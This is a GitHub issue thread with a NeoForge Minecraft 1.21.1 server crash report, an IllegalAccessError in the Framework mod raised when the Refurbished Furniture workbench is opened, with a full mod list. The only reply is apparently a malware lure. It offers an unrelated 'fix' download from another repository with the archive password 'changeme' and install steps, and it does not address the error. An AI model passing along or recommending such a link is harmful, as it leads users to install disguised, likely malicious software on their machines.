### ISSUE TITLE
NeoForge minecraft server crashes after i open the workbench from mrcrayfish furniture refurbish, pls help

### ISSUE THREAD

**Issue by Kudraroke1** [MrCrayfish/MrCrayfishGunMod#544]
---- Minecraft Crash Report ----
// Oops.

Time: 2024-08-28 23:53:25
Description: Exception in server tick loop

java.lang.IllegalAccessError: class com.mrcrayfish.framework.platform.NeoForgeNetworkHelper tried to access private field net.minecraft.server.level.ServerPlayer.containerCounter (com.mrcrayfish.framework.platform.NeoForgeNetworkHelper is in module framework@0.9.0 of loader 'TRANSFORMER' @d611f1c; net.minecraft.server.level.ServerPlayer is in module minecraft@1.21.1 of loader 'TRANSFORMER' @d611f1c)
	at TRANSFORMER/framework@0.9.0/com.mrcrayfish.framework.platform.NeoForgeNetworkHelper.openMenuWithData(NeoForgeNetworkHelper.java:33) ~[framework-neoforge-1.21-0.9.0.jar%23243!/:?] {re:classloading}
	at TRANSFORMER/framework@0.9.0/com.mrcrayfish.framework.api.FrameworkAPI.openMenuWithData(FrameworkAPI.java:57) ~[framework-neoforge-1.21-0.9.0.jar%23243!/:?] {re:classloading}
	at TRANSFORMER/refurbished_furniture@1.0.6/com.mrcrayfish.furniture.refurbished.block.WorkbenchBlock.useWithoutItem(WorkbenchBlock.java:67) ~[refurbished_furniture-neoforge-1.21-1.0.6.jar%23282!/:?] {re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.world.level.block.state.BlockBehaviour$BlockStateBase.useWithoutItem(BlockBehaviour.java:757) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:computing_frames,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:APP:modernfix-common.mixins.json:bugfix.chunk_deadlock.BlockStateBaseMixin from mod modernfix,pl:mixin:APP:modernfix-common.mixins.json:perf.reduce_blockstate_cache_rebuilds.BlockStateBaseMixin from mod modernfix,pl:mixin:APP:ferritecore.blockstatecache.mixin.json:BlockStateBaseMixin from mod ferritecore,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.level.ServerPlayerGameMode.useItemOn(ServerPlayerGameMode.java:370) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:computing_frames,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.network.ServerGamePacketListenerImpl.handleUseItemOn(ServerGamePacketListenerImpl.java:1122) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,re:classloading,pl:mixin:APP:betterchunkloading.mixins.json:PlayerMovementNoUnloaded from mod betterchunkloading,pl:mixin:APP:aoa3.mixins.json:common.patch.ServerGamePacketListenerImplMixin from mod aoa3,pl:mixin:APP:badpackets.mixins.json:MixinServerGamePacketListenerImpl from mod badpackets,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.network.protocol.game.ServerboundUseItemOnPacket.handle(ServerboundUseItemOnPacket.java:42) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.network.protocol.game.ServerboundUseItemOnPacket.handle(ServerboundUseItemOnPacket.java:10) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.network.protocol.PacketUtils.lambda$ensureRunningOnSameThread$0(PacketUtils.java:27) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.TickTask.run(TickTask.java:18) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.util.thread.BlockableEventLoop.doRunTask(BlockableEventLoop.java:148) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:computing_frames,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:APP:modernfix-common.mixins.json:perf.fix_loop_spin_waiting.BlockableEventLoopMixin from mod modernfix,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.util.thread.ReentrantBlockableEventLoop.doRunTask(ReentrantBlockableEventLoop.java:23) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,re:computing_frames,re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.MinecraftServer.doRunTask(MinecraftServer.java:872) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.MinecraftServer.doRunTask(MinecraftServer.java:170) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.util.thread.BlockableEventLoop.pollTask(BlockableEventLoop.java:122) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:computing_frames,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:APP:modernfix-common.mixins.json:perf.fix_loop_spin_waiting.BlockableEventLoopMixin from mod modernfix,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.MinecraftServer.pollTaskInternal(MinecraftServer.java:855) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.MinecraftServer.pollTask(MinecraftServer.java:849) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.util.thread.BlockableEventLoop.runAllTasks(BlockableEventLoop.java:111) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:computing_frames,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:APP:modernfix-common.mixins.json:perf.fix_loop_spin_waiting.BlockableEventLoopMixin from mod modernfix,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.MinecraftServer.waitUntilNextTick(MinecraftServer.java:825) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:712) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.server.MinecraftServer.lambda$spin$2(MinecraftServer.java:267) ~[server-1.21.1-20240808.144430-srg.jar%23210!/:?] {re:mixin,pl:accesstransformer:B,re:classloading,pl:accesstransformer:B,pl:mixin:A}
	at java.base/java.lang.Thread.run(Thread.java:1583) [?:?] {re:mixin}

A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- System Details --
Details:
	Minecraft Version: 1.21.1
	Minecraft Version ID: 1.21.1
	Operating System: Linux (amd64) version 5.15.0-118-generic
	Java Version: 21.0.3, Eclipse Adoptium
	Java VM Version: OpenJDK 64-Bit Server VM (mixed mode, sharing), Eclipse Adoptium
	Memory: 7355009656 bytes (7014 MiB) / 11173625856 bytes (10656 MiB) up to 17179869184 bytes (16384 MiB)
	CPUs: 4
	Processor Vendor: AuthenticAMD
	Processor Name: AMD Ryzen 9 7950X 16-Core Processor
	Identifier: AuthenticAMD Family 25 Model 97 Stepping 2
	Microarchitecture: Zen 3
	Frequency (GHz): -0.00
	Number of physical packages: 1
	Number of physical CPUs: 16
	Number of logical CPUs: 32
	Graphics card #0 name: unknown
	Graphics card #0 vendor: unknown
	Graphics card #0 VRAM (MiB): 0.00
	Graphics card #0 deviceId: unknown
	Graphics card #0 versionInfo: unknown
	Virtual memory max (MiB): 112563.84
	Virtual memory used (MiB): 35183.44
	Swap memory total (MiB): 16384.00
	Swap memory used (MiB): 62.00
	Space in storage for jna.tmpdir (MiB): <path not set>
	Space in storage for org.lwjgl.system.SharedLibraryExtractPath (MiB): <path not set>
	Space in storage for io.netty.native.workdir (MiB): <path not set>
	Space in storage for java.io.tmpdir (MiB): available: 1640333.25, total: 1799181.63
	Space in storage for workdir (MiB): available: 1640333.25, total: 1799181.63
	JVM Flags: 21 total; -XX:ActiveProcessorCount=4 -Xmx16384M -Xms10649M -XX:+UseG1GC -XX:+ParallelRefProcEnabled -XX:MaxGCPauseMillis=200 -XX:+UnlockExperimentalVMOptions -XX:+DisableExplicitGC -XX:+AlwaysPreTouch -XX:G1NewSizePercent=30 -XX:G1MaxNewSizePercent=40 -XX:G1HeapRegionSize=8M -XX:G1ReservePercent=20 -XX:G1HeapWastePercent=5 -XX:G1MixedGCCountTarget=4 -XX:InitiatingHeapOccupancyPercent=15 -XX:G1MixedGCLiveThresholdPercent=90 -XX:G1RSetUpdatingPauseTimePercent=5 -XX:SurvivorRatio=32 -XX:+PerfDisableSharedMem -XX:MaxTenuringThreshold=1
	Server Running: true
	Player Count: 4 / 9999; [ServerPlayer['N1c1n0'/23, l='ServerLevel[neoforged_1_21_1_2971899]', x=186.66, y=31.55, z=317.81], ServerPlayer['Vivimarshmallow'/226, l='ServerLevel[neoforged_1_21_1_2971899]', x=-25.63, y=232.00, z=1872.70], ServerPlayer['kittimiku'/558, l='ServerLevel[neoforged_1_21_1_2971899]', x=253.81, y=109.00, z=1902.13], ServerPlayer['lisilisi'/882, l='ServerLevel[neoforged_1_21_1_2971899]', x=278.74, y=115.00, z=1752.72]]
	Active Data Packs: vanilla, mod/explorify, mod_data, mod/cyclopscore (incompatible), mod/kuma_api (incompatible), mod/geckolib, mod/playeranimator, mod/sophisticatedcore (incompatible), mod/mcwfurnituresbop, mod/cookingforblockheads (incompatible), mod/neoforge, mod/modernfix (incompatible), mod/autochefsdelight (incompatible), mod/macawsbridgesbop, mod/sophisticatedbackpacks (incompatible), mod/medievalend (incompatible), mod/relics (incompatible), mod/mcwdoors (incompatible), mod/medieval_buildings (incompatible), mod/fcbop, mod/balm (incompatible), mod/carryon (incompatible), mod/withersweapons, mod/konkrete (incompatible), mod/athena, mod/mcwbridges (incompatible), mod/farmersdelight (incompatible), mod/simplyharvesting, mod/ambientsounds (incompatible), mod/supermartijn642corelib, mod/eyesinthedarkness (incompatible), mod/wthit,waila (incompatible), mod/mcwfencesbop, mod/mcwfences (incompatible), mod/curios (incompatible), mod/mr_dungeons_andtaverns, mod/mcwroofs (incompatible), mod/macawsroofsbop, mod/architectury (incompatible), mod/mcwfurnitures (incompatible), mod/cupboard (incompatible), mod/refurbished_furniture (incompatible), mod/undergarden, mod/framework (incompatible), mod/t_and_t, mod/journeymap_api (incompatible), mod/smartbrainlib (incompatible), mod/inventorysorter (incompatible), mod/cucumber, mod/octolib, mod/aoa3, mod/jei (incompatible), mod/commonnetworking (incompatible), mod/caelus (incompatible), mod/waystones (incompatible), mod/monsterplus (incompatible), mod/tslateffectslib, mod/structory, mod/clumps (incompatible), mod/journeymap (incompatible), mod/naturescompass (incompatible), mod/badpackets (incompatible), mod/dungeoncrawl, mod/glitchcore (incompatible), mod/more_babies (incompatible), mod/fusion, mod/skinlayers3d (incompatible), mod/raided, mod/polytone (incompatible), mod/mysticalagriculture, mod/mysticalagradditions, mod/ironchest, mod/dungeons_arise, mod/tectonic, mod/voicechat (incompatible), mod/sound_physics_remastered (incompatible), mod/terrablender (incompatible), mod/biomesoplenty (incompatible), mod/titanium, mod/jitl (incompatible), mod/creativecore (incompatible), mod/sushigocrafting (incompatible), mod/notenoughanimations (incompatible), mod/iceberg, mod/gravestone (incompatible), mod/storagedrawers, mod/irons_spellbooks (incompatible), mod/armoroftheages (incompatible), mod/betterchunkloading (incompatible), mod/railcraft, mod/modonomicon (incompatible), mod/ambientenvironment (incompatible), mod/lootr, mod/ferritecore (incompatible), mod/connectedglass, mod/chisel (incompatible), mod/occultism, mod/cristellib, tectonic, resources/t_and_t_waystones_patch
	Available Data Packs: bundle, trade_rebalance, vanilla, mod/ambientenvironment (incompatible), mod/ambientsounds (incompatible), mod/aoa3, mod/architectury (incompatible), mod/armoroftheages (incompatible), mod/athena, mod/autochefsdelight (incompatible), mod/badpackets (incompatible), mod/balm (incompatible), mod/betterchunkloading (incompatible), mod/biomesoplenty (incompatible), mod/caelus (incompatible), mod/carryon (incompatible), mod/chisel (incompatible), mod/clumps (incompatible), mod/commonnetworking (incompatible), mod/connectedglass, mod/cookingforblockheads (incompatible), mod/creativecore (incompatible), mod/cristellib, mod/cucumber, mod/cupboard (incompatible), mod/curios (incompatible), mod/cyclopscore (incompatible), mod/dungeoncrawl, mod/dungeons_arise, mod/explorify, mod/eyesinthedarkness (incompatible), mod/farmersdelight (incompatible), mod/fcbop, mod/ferritecore (incompatible), mod/framework (incompatible), mod/fusion, mod/geckolib, mod/glitchcore (incompatible), mod/gravestone (incompatible), mod/iceberg, mod/inventorysorter (incompatible), mod/ironchest, mod/irons_spellbooks (incompatible), mod/jei (incompatible), mod/jitl (incompatible), mod/journeymap (incompatible), mod/journeymap_api (incompatible), mod/konkrete (incompatible), mod/kuma_api (incompatible), mod/lootr, mod/macawsbridgesbop, mod/macawsroofsbop, mod/mcwbridges (incompatible), mod/mcwdoors (incompatible), mod/mcwfences (incompatible), mod/mcwfencesbop, mod/mcwfurnitures (incompatible), mod/mcwfurnituresbop, mod/mcwroofs (incompatible), mod/medieval_buildings (incompatible), mod/medievalend (incompatible), mod/modernfix (incompatible), mod/modonomicon (incompatible), mod/monsterplus (incompatible), mod/more_babies (incompatible), mod/mr_dungeons_andtaverns, mod/mysticalagradditions, mod/mysticalagriculture, mod/naturescompass (incompatible), mod/neoforge, mod/notenoughanimations (incompatible), mod/occultism, mod/octolib, mod/playeranimator, mod/polytone (incompatible), mod/raided, mod/railcraft, mod/refurbished_furniture (incompatible), mod/relics (incompatible), mod/simplyharvesting, mod/skinlayers3d (incompatible), mod/smartbrainlib (incompatible), mod/sophisticatedbackpacks (incompatible), mod/sophisticatedcore (incompatible), mod/sound_physics_remastered (incompatible), mod/storagedrawers, mod/structory, mod/supermartijn642corelib, mod/sushigocrafting (incompatible), mod/t_and_t, mod/tectonic, mod/terrablender (incompatible), mod/titanium, mod/tslateffectslib, mod/undergarden, mod/voicechat (incompatible), mod/waystones (incompatible), mod/withersweapons, mod/wthit,waila (incompatible), mod_data, tectonic, resources/t_and_t_waystones_patch
	Enabled Feature Flags: minecraft:vanilla
	World Generation: Stable
	World Seed: -2206550953541102220
	Is Modded: Definitely; Server brand changed to 'neoforge'
	Type: Dedicated Server (map_server.txt)
	ModLauncher: 11.0.4+main.d2e20e43
	ModLauncher launch target: forgeserver
	ModLauncher services: 
		sponge-mixin-0.15.2+mixin.0.8.7.jar mixin PLUGINSERVICE 
		loader-4.0.24.jar slf4jfixer PLUGINSERVICE 
		loader-4.0.24.jar runtime_enum_extender PLUGINSERVICE 
		at-modlauncher-10.0.1.jar accesstransformer PLUGINSERVICE 
		loader-4.0.24.jar runtimedistcleaner PLUGINSERVICE 
		modlauncher-11.0.4.jar mixin TRANSFORMATIONSERVICE 
		modlauncher-11.0.4.jar fml TRANSFORMATIONSERVICE 
	FML Language Providers: 
		javafml@4.0
		lowcodefml@4.0
		minecraft@4.0
	Mod List: 
		CyclopsCore-1.21-neoforge-1.19.10.jar             |Cyclops Core                  |cyclopscore                   |1.19.10             |Manifest: NOSIGNATURE
		kuma-api-neoforge-21.0.5-SNAPSHOT.jar             |KumaAPI                       |kuma_api                      |21.0.5-SNAPSHOT     |Manifest: NOSIGNATURE
		geckolib-neoforge-1.21-4.5.8.jar                  |GeckoLib 4                    |geckolib                      |4.5.8               |Manifest: NOSIGNATURE
		player-animation-lib-forge-1.0.2-rc1+1.21.jar     |Player Animator               |playeranimator                |1.0.2-rc1+1.21      |Manifest: NOSIGNATURE
		sophisticatedcore-1.21-0.6.31.631.jar             |Sophisticated Core            |sophisticatedcore             |0.6.31              |Manifest: NOSIGNATURE
		mcwfurnituresbop-neoforged-1.21-1.0.jar           |Macaw's Furnitures - BOP      |mcwfurnituresbop              |1.21-1.0            |Manifest: NOSIGNATURE
		cookingforblockheads-neoforge-1.21.1-21.1.1.jar   |Cooking for Blockheads        |cookingforblockheads          |21.1.1              |Manifest: NOSIGNATURE
		neoforge-21.1.26-universal.jar                    |NeoForge                      |neoforge                      |21.1.26             |Manifest: NOSIGNATURE
		modernfix-neoforge-5.19.1+mc1.21.jar              |ModernFix                     |modernfix                     |5.19.1+mc1.21       |Manifest: NOSIGNATURE
		AutochefsDelight-1.21-NeoForge-2.0.0.jar          |Autochef's Delight            |autochefsdelight              |2.0.0+neoforge      |Manifest: NOSIGNATURE
		macawsbridgesbop_neoforged-1.21-1.0.jar           |Macaw's Bridges - BOP         |macawsbridgesbop              |1.21-1.0            |Manifest: NOSIGNATURE
		sophisticatedbackpacks-1.21-3.20.9.1060.jar       |Sophisticated Backpacks       |sophisticatedbackpacks        |3.20.9              |Manifest: NOSIGNATURE
		Medieval-Buildings-End-Edition-Mod-NeoForge-1.21.j|Medieval Buildings [The End Ed|medievalend                   |1.0.2               |Manifest: NOSIGNATURE
		relics-1.21-0.8.4.jar                             |Relics                        |relics                        |0.8.4               |Manifest: NOSIGNATURE
		mcw-doors-1.1.1neoforge-mc1.21.jar                |Macaw's Doors                 |mcwdoors                      |1.1.1               |Manifest: NOSIGNATURE
		neo_medieval_buildings-1.0.2-1.21.jar             |Medieval Buildings            |medieval_buildings            |1.0.2               |Manifest: NOSIGNATURE
		farmers-cutting-biomes-o-plenty-2.0.0-1.21.jar    |Farmer's Cutting: Biomes O' Pl|fcbop                         |2.0.0               |Manifest: NOSIGNATURE
		balm-neoforge-1.21.1-21.0.18.jar                  |Balm                          |balm                          |21.0.18             |Manifest: NOSIGNATURE
		carryon-neoforge-1.21-2.2.1.jar                   |Carry On                      |carryon                       |2.2.1               |Manifest: NOSIGNATURE
		withersweapons-1.7.4.jar                          |Withers Weapons               |withersweapons                |1.7                 |Manifest: NOSIGNATURE
		konkrete_neoforge_1.9.9_MC_1.21.jar               |Konkrete                      |konkrete                      |1.9.9               |Manifest: NOSIGNATURE
		athena-neoforge-1.21-4.0.1.jar                    |Athena                        |athena                        |4.0.1               |Manifest: NOSIGNATURE
		mcw-bridges-3.0.0-mc1.21neoforge.jar              |Macaw's Bridges               |mcwbridges                    |3.0.0               |Manifest: NOSIGNATURE
		FarmersDelight-1.21-1.2.4.jar                     |Farmer's Delight              |farmersdelight                |1.2.4               |Manifest: NOSIGNATURE
		SimplyHarvesting-1.21-3.0.0.jar                   |Simply Harvesting             |simplyharvesting              |1.21-3.0.0          |Manifest: NOSIGNATURE
		AmbientSounds_NEOFORGE_v6.0.4_mc1.21.jar          |AmbientSounds                 |ambientsounds                 |6.0.4               |Manifest: NOSIGNATURE
		Explorify v1.6.1 f10-48.jar                       |Explorify                     |explorify                     |1.6.1               |Manifest: NOSIGNATURE
		supermartijn642corelib-1.1.17f-neoforge-mc1.21.jar|SuperMartijn642's Core Lib    |supermartijn642corelib        |1.1.17+f            |Manifest: NOSIGNATURE
		EyesInTheDarkness-1.21-1.4.5.jar                  |Eyes in the Darkness          |eyesinthedarkness             |1.4.5               |Manifest: NOSIGNATURE
		wthit-neo-12.4.0.jar                              |wthit                         |wthit                         |12.4.0              |Manifest: NOSIGNATURE
		mcwfencesbop-neoforged-1.21-1.1.jar               |Macaw's Fences - BOP          |mcwfencesbop                  |1.21-1.1            |Manifest: NOSIGNATURE
		mcw-fences-1.1.2-mc1.21neoforge.jar               |Macaw's Fences and Walls      |mcwfences                     |1.1.2               |Manifest: NOSIGNATURE
		curios-neoforge-9.0.7+1.21.jar                    |Curios API                    |curios                        |9.0.7+1.21          |Manifest: NOSIGNATURE
		dungeons-and-taverns-v4.3 [NeoForge].jar          |Dungeons and Taverns          |mr_dungeons_andtaverns        |1-v4.3              |Manifest: NOSIGNATURE
		mcw-roofs-2.3.1-mc1.21neoforge.jar                |Macaw's Roofs                 |mcwroofs                      |2.3.1               |Manifest: NOSIGNATURE
		macawsroofsbop-neoforge-1.21-1.0.jar              |Macaw's Roofs - BOP           |macawsroofsbop                |1.21-1.0            |Manifest: NOSIGNATURE
		architectury-13.0.6-neoforge.jar                  |Architectury                  |architectury                  |13.0.6              |Manifest: NOSIGNATURE
		mcw-furniture-3.3.0-mc1.21neoforge.jar            |Macaw's Furniture             |mcwfurnitures                 |3.3.0               |Manifest: NOSIGNATURE
		cupboard-1.21-2.8.jar                             |Cupboard mod                  |cupboard                      |2.8                 |Manifest: NOSIGNATURE
		refurbished_furniture-neoforge-1.21-1.0.6.jar     |MrCrayfish's Furniture Mod: Re|refurbished_furniture         |1.0.6               |Manifest: NOSIGNATURE
		The_Undergarden-1.21-0.8.19.jar                   |The Undergarden               |undergarden                   |0.8.19              |Manifest: NOSIGNATURE
		framework-neoforge-1.21-0.9.0.jar                 |Framework                     |framework                     |0.9.0               |Manifest: NOSIGNATURE
		t_and_t-neoforge-fabric-1.13.2.jar                |Towns and Towers              |t_and_t                       |1.13.2              |Manifest: NOSIGNATURE
		journeymap-api-neoforge-2.0.0-1.21-SNAPSHOT.jar   |JourneyMap API                |journeymap_api                |2.0.0               |Manifest: NOSIGNATURE
		SmartBrainLib-neoforge-1.21-1.14.5.jar            |SmartBrainLib                 |smartbrainlib                 |1.14.5              |Manifest: NOSIGNATURE
		inventorysorter-1.21-24.0.5.jar                   |Simple Inventory Sorter       |inventorysorter               |24.0.5              |Manifest: NOSIGNATURE
		Cucumber-1.21.1-8.0.3.jar                         |Cucumber Library              |cucumber                      |8.0.3               |Manifest: NOSIGNATURE
		OctoLib-NEOFORGE-0.4.2.jar                        |OctoLib                       |octolib                       |0.4.2               |Manifest: NOSIGNATURE
		AoA3-1.21-3.7.11.jar                              |Advent Of Ascension           |aoa3                          |3.7.11              |Manifest: NOSIGNATURE
		jei-1.21-neoforge-19.8.2.99.jar                   |Just Enough Items             |jei                           |19.8.2.99           |Manifest: NOSIGNATURE
		common-networking-neoforge-1.0.11-1.21.jar        |Common Networking             |commonnetworking              |1.0.11-1.21         |Manifest: NOSIGNATURE
		caelus-neoforge-7.0.0+1.21.jar                    |Caelus API                    |caelus                        |7.0.0+1.21          |Manifest: NOSIGNATURE
		waystones-neoforge-1.21.1-21.1.1.jar              |Waystones                     |waystones                     |21.1.1              |Manifest: NOSIGNATURE
		MonsterPlus-NeoForge1.21.1-v1.1.8.2.jar           |Monster Plus                  |monsterplus                   |1.1.8.2             |Manifest: NOSIGNATURE
		TslatEffectsLib-neoforge-1.21-1.9.1.jar           |Tslat Effects Lib (TEL)       |tslateffectslib               |1.9.1               |Manifest: NOSIGNATURE
		Structory_1.21_v1.3.5.jar                         |Structory                     |structory                     |1.3.5               |Manifest: NOSIGNATURE
		Clumps-neoforge-1.21-18.0.0.2.jar                 |Clumps                        |clumps                        |18.0.0.2            |Manifest: NOSIGNATURE
		journeymap-neoforge-1.21-6.0.0-beta.20.jar        |Journeymap                    |journeymap                    |1.21-6.0.0-beta.20  |Manifest: NOSIGNATURE
		NaturesCompass-1.21-3.0.3-neoforge.jar            |Nature's Compass              |naturescompass                |1.21-3.0.2-neoforge |Manifest: NOSIGNATURE
		badpackets-neo-0.8.1.jar                          |Bad Packets                   |badpackets                    |0.8.1               |Manifest: NOSIGNATURE
		DungeonCrawl-NeoForge-1.21-2.3.14.jar             |Dungeon Crawl                 |dungeoncrawl                  |2.3.14              |Manifest: NOSIGNATURE
		GlitchCore-neoforge-1.21-2.0.0.3.jar              |GlitchCore                    |glitchcore                    |2.0.0.3             |Manifest: NOSIGNATURE
		more_babies-neoforge-1.21-2.0.0.jar               |More Babies                   |more_babies                   |2.0.0               |Manifest: NOSIGNATURE
		fusion-1.1.1-neoforge-mc1.21.jar                  |Fusion                        |fusion                        |1.1.1               |Manifest: NOSIGNATURE
		skinlayers3d-neoforge-1.6.7-mc1.21.jar            |3d-Skin-Layers                |skinlayers3d                  |1.6.7               |Manifest: NOSIGNATURE
		Raided-1.21-0.1.4.1.jar                           |Raided                        |raided                        |0.1.4.1             |Manifest: NOSIGNATURE
		polytone-1.21-2.3.12.jar                          |Polytone                      |polytone                      |1.21-2.3.12         |Manifest: NOSIGNATURE
		MysticalAgriculture-1.21.1-8.0.4.jar              |Mystical Agriculture          |mysticalagriculture           |8.0.4               |Manifest: NOSIGNATURE
		MysticalAgradditions-1.21.1-8.0.0.jar             |Mystical Agradditions         |mysticalagradditions          |8.0.0               |Manifest: NOSIGNATURE
		ironchest-1.21-neoforge-16.0.7.jar                |Iron Chests                   |ironchest                     |1.21-neoforge-16.0.7|Manifest: NOSIGNATURE
		DungeonsArise-1.21.x-2.1.60-release.jar           |When Dungeons Arise           |dungeons_arise                |2.1.60              |Manifest: NOSIGNATURE
		tectonic-neoforge-1.21-2.4.1.jar                  |Tectonic                      |tectonic                      |2.4.1               |Manifest: NOSIGNATURE
		server-1.21.1-20240808.144430-srg.jar             |Minecraft                     |minecraft                     |1.21.1              |Manifest: NOSIGNATURE
		voicechat-neoforge-1.21.1-2.5.20.jar              |Simple Voice Chat             |voicechat                     |1.21.1-2.5.20       |Manifest: NOSIGNATURE
		sound-physics-remastered-neoforge-1.21.1-1.4.6.jar|Sound Physics Remastered      |sound_physics_remastered      |1.21.1-1.4.6        |Manifest: NOSIGNATURE
		TerraBlender-neoforge-1.21-4.0.0.2.jar            |TerraBlender                  |terrablender                  |4.0.0.2             |Manifest: NOSIGNATURE
		BiomesOPlenty-neoforge-1.21-21.0.0.15.jar         |Biomes O' Plenty              |biomesoplenty                 |21.0.0.15           |Manifest: NOSIGNATURE
		titanium-1.21-4.0.12.jar                          |Titanium                      |titanium                      |4.0.12              |Manifest: NOSIGNATURE
		JITL - 1.21.1 - 2.1.7.jar                         |Journey Into the Light        |jitl                          |2.1.7               |Manifest: NOSIGNATURE
		CreativeCore_NEOFORGE_v2.12.6_mc1.21.jar          |CreativeCore                  |creativecore                  |2.12.6              |Manifest: NOSIGNATURE
		sushigocrafting-1.21-0.6.2.jar                    |Sushi Go Crafting             |sushigocrafting               |0.6.2               |Manifest: NOSIGNATURE
		notenoughanimations-neoforge-1.7.4-mc1.21.jar     |NotEnoughAnimations           |notenoughanimations           |1.7.4               |Manifest: NOSIGNATURE
		Iceberg-1.21-neoforge-1.2.5.jar                   |Iceberg                       |iceberg                       |1.2.5               |Manifest: NOSIGNATURE
		gravestone-neoforge-1.21.1-1.0.21.jar             |Gravestone Mod                |gravestone                    |1.21.1-1.0.21       |Manifest: NOSIGNATURE
		StorageDrawers-1.21-13.2.0.jar                    |Storage Drawers               |storagedrawers                |13.2.0              |Manifest: NOSIGNATURE
		irons_spellbooks-1.21-3.4.5-all.jar               |Iron's Spells 'n Spellbooks   |irons_spellbooks              |1.21-3.4.5          |Manifest: NOSIGNATURE
		armoroftheages-neoforge-1.21-1.4.3.jar            |Armor of the Ages             |armoroftheages                |1.4.3               |Manifest: NOSIGNATURE
		betterchunkloading-1.21-4.4.jar                   |betterchunkloading mod        |betterchunkloading            |4.4                 |Manifest: NOSIGNATURE
		railcraft-reborn-1.21-1.2.1.jar                   |Railcraft Reborn              |railcraft                     |1.2.1               |Manifest: NOSIGNATURE
		modonomicon-1.21.1-neoforge-1.100.2.jar           |Modonomicon                   |modonomicon                   |1.100.2             |Manifest: NOSIGNATURE
		AmbientEnvironment-neoforge-1.21-17.0.0.5.jar     |AmbientEnvironment            |ambientenvironment            |17.0.0.5            |Manifest: NOSIGNATURE
		lootr-neoforge-1.21-1.10.33.79.jar                |Lootr                         |lootr                         |1.21-1.10.33.79     |Manifest: NOSIGNATURE
		ferritecore-7.0.0-neoforge.jar                    |Ferrite Core                  |ferritecore                   |7.0.0               |Manifest: 41:ce:50:66:d1:a0:05:ce:a1:0e:02:85:9b:46:64:e0:bf:2e:cf:60:30:9a:fe:0c:27:e0:63:66:9a:84:ce:8a
		connectedglass-1.1.12-neoforge-mc1.21.jar         |Connected Glass               |connectedglass                |1.1.12              |Manifest: NOSIGNATURE
		chisel-neoforge-1.21-1.8.1.jar                    |Chisel Reborn                 |chisel                        |1.8.1               |Manifest: NOSIGNATURE
		occultism-1.21.1-neoforge-1.153.1.jar             |Occultism                     |occultism                     |1.153.1             |Manifest: NOSIGNATURE
		cristellib-neoforge-1.2.7.jar                     |Cristel Lib                   |cristellib                    |1.2.7               |Manifest: NOSIGNATURE
	Crash Report UUID: 3a696c57-29b1-447f-b856-0d0a1c000396
	FML: 4.0.24
	NeoForge: 21.1.26

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
